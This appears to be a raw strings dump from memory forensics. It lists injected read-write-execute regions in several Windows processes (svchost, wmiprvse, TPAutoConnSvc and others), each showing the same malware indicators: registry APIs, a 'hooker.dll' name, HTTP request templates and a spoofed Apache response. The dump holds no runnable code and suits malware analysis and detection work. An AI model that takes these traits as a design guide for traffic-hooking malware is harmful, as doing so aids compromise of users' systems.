`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1280_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
Dwm.exe_1376_rwx_20020000_00001000:
.text
`.rdata
@.data
.reloc
Explorer.EXE_1440_rwx_20020000_00001000:
.text
`.rdata
@.data
.reloc
wmiprvse.exe_1468_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wmiprvse.exe_1468_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wmiprvse.exe_1468_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wmiprvse.exe_1468_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wmiprvse.exe_1468_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wmiprvse.exe_1468_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wmiprvse.exe_1468_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wmiprvse.exe_1468_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wmiprvse.exe_1468_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wmiprvse.exe_1468_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wmiprvse.exe_1468_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wmiprvse.exe_1468_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wmiprvse.exe_1468_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wmiprvse.exe_1468_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
conhost.exe_1648_rwx_20020000_00001000:
.text
`.rdata
@.data
.reloc
TPAutoConnSvc.exe_1676_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnSvc.exe_1676_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnSvc.exe_1676_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnSvc.exe_1676_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnSvc.exe_1676_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnSvc.exe_1676_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnSvc.exe_1676_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnSvc.exe_1676_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnSvc.exe_1676_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnSvc.exe_1676_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnSvc.exe_1676_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnSvc.exe_1676_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnSvc.exe_1676_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
TPAutoConnSvc.exe_1676_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1732_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
